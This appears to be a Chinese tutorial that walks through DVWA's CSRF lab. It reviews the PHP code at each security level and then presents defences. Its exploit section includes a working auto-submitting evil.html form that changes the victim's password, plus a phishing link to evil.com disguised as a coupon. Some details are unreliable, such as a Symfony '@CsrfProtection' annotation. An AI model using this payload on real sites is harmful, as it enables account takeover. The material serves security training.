深入PHP代码审计：DVWA CSRF模块通关全流程解析

一、DVWA平台与CSRF漏洞基础认知

DVWA（Damn Vulnerable Web Application）是一个专门用于安全研究的漏洞练习平台，其CSRF（Cross-Site Request Forgery）模块模拟了真实场景中的跨站请求伪造攻击。CSRF漏洞的核心在于攻击者诱导用户执行非预期的HTTP请求，当用户同时保持目标网站的登录状态时，攻击者可通过构造恶意链接或页面实现权限滥用。

在PHP环境中，CSRF漏洞通常由以下因素引发：

1. 未验证请求来源（Referer头缺失）
2. 未使用CSRF Token机制
3. 敏感操作仅依赖Cookie认证

以DVWA的CSRF模块为例，其默认配置（Low Security）存在典型的CSRF漏洞。开发者可通过修改dvwa/vulnerabilities/csrf/目录下的PHP文件，观察不同安全级别下的代码实现差异。

二、DVWA CSRF模块代码审计流程

1. Low Security级别代码分析

// dvwa/vulnerabilities/csrf/source/low.php
if( isset( $_GET[ 'change_pass' ] ) ) {
    $pass_new = $_GET[ 'password_new' ];
    $pass_conf = $_GET[ 'password_conf' ];
    // 输入验证缺失
    if( $pass_new == $pass_conf ) {
        $pass_new = md5( $pass_new );
        $query = "UPDATE users SET password = '$pass_new' WHERE user = '".dvwaCurrentUser()."';";
        $result = mysqli_query($GLOBALS["___mysqli_ston"], $query) or die( '<pre>'.((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)).'</pre>' );
        echo "<pre>Password Changed.</pre>";
    }
    else {
        echo "<pre>Passwords did not match.</pre>";
    }
}

漏洞点解析：

• 完全依赖GET参数传递新密码
• 未验证请求来源（可通过任意站点发起请求）
• 未使用CSRF Token
• 密码直接拼接SQL语句（存在SQL注入风险）

2. Medium Security级别改进

// dvwa/vulnerabilities/csrf/source/medium.php
if( isset( $_GET[ 'change_pass' ] ) && ( $_SERVER[ 'HTTP_REFERER' ] == "http://".$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'] ) ) {
    // 仅验证Referer头（不可靠）
    // ...后续密码修改逻辑...
}

局限性：

• Referer头可被篡改（通过浏览器插件或中间人攻击）
• 未实现完整的CSRF防护机制

3. High Security级别实现

// dvwa/vulnerabilities/csrf/source/high.php
session_start();
if( isset( $_GET[ 'change_pass' ] ) ) {
    if( !isset( $_SESSION[ 'csrf_token' ] ) || !isset( $_GET[ 'user_token' ] ) || $_SESSION[ 'csrf_token' ] !== $_GET[ 'user_token' ] ) {
        echo "<pre>CSRF token validation failed.</pre>";
        return;
    }
    // 密码修改逻辑...
}
// 生成Token
$_SESSION[ 'csrf_token' ] = bin2hex(random_bytes(32));

安全机制：

• 服务器端生成随机Token
• 客户端提交时验证Token一致性
• Token与用户会话绑定

三、CSRF漏洞利用实战

1. 构造恶意页面

<!-- evil.html -->
<html>
<body onload="document.forms[0].submit()">
<form action="http://target.com/dvwa/vulnerabilities/csrf/?change_pass=1" method="GET">
    <input type="hidden" name="password_new" value="hacked123">
    <input type="hidden" name="password_conf" value="hacked123">
    <input type="hidden" name="user_token" value="<从受害者会话获取>">
</form>
</body>
</html>

利用条件：

• 受害者已登录DVWA
• 攻击者知晓或能预测CSRF Token（High级别下需结合其他漏洞）

2. 社会工程学诱导

通过钓鱼邮件、恶意链接等方式诱导用户访问恶意页面：

<a href="http://evil.com/evil.html">点击领取优惠券</a>

四、防御方案与最佳实践

1. 同步Token模式实现

// 生成Token
session_start();
if(empty($_SESSION['csrf_token'])) {
    $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
}
// 表单中嵌入Token
<input type="hidden" name="csrf_token" value="<?php echo $_SESSION['csrf_token']; ?>">
// 验证逻辑
if($_POST['csrf_token'] !== $_SESSION['csrf_token']) {
    die('CSRF攻击拦截');
}

2. 双重提交Cookie模式

// 设置Cookie
setcookie('csrf_token', bin2hex(random_bytes(32)), time()+3600, '/');
// 验证时同时检查Cookie和POST数据
if($_POST['csrf_token'] !== $_COOKIE['csrf_token']) {
    die('CSRF验证失败');
}

3. 框架级防护

使用现代PHP框架内置的CSRF保护：

• Laravel: csrf_field() 辅助函数
• Symfony: @CsrfProtection 注解
• CodeIgniter: $this->security->get_csrf_token_name()

五、企业级安全建议

1. 防御深度：结合多种防护机制（Token+Referer验证+自定义Header）
2. Token管理：
   • 设置合理的过期时间（建议15-30分钟）
   • 每次操作生成新Token
   • 敏感操作要求重新认证
3. 监控与告警：
   • 记录可疑的CSRF尝试
   • 设置异常请求阈值
4. 安全开发规范：
   • 强制所有表单包含CSRF保护
   • 禁止使用GET方法修改数据
   • 定期进行安全审计

六、DVWA实验扩展

1. 安全级别对比：

   • Low: 无防护，直接利用
   • Medium: Referer验证（可绕过）
   • High: Token验证（需结合其他漏洞）
   • Impossible: 双重验证+密码强度检查

2. 自动化审计工具：

   • 使用OWASP ZAP扫描CSRF漏洞
   • 编写自定义Burp Suite插件检测缺失Token

3. 实际项目迁移：

   • 将DVWA中学到的防护模式应用到现有系统
   • 开发CSRF防护中间件供多个项目复用

通过系统化的DVWA CSRF模块审计，开发者不仅能掌握具体的漏洞利用技巧，更能深入理解Web应用安全的核心原则。建议将此过程纳入持续安全培训体系，定期更新测试用例以应对新型攻击手段。实际项目中应采用”默认安全”的设计理念，在开发初期就集成CSRF防护机制，而非事后修补。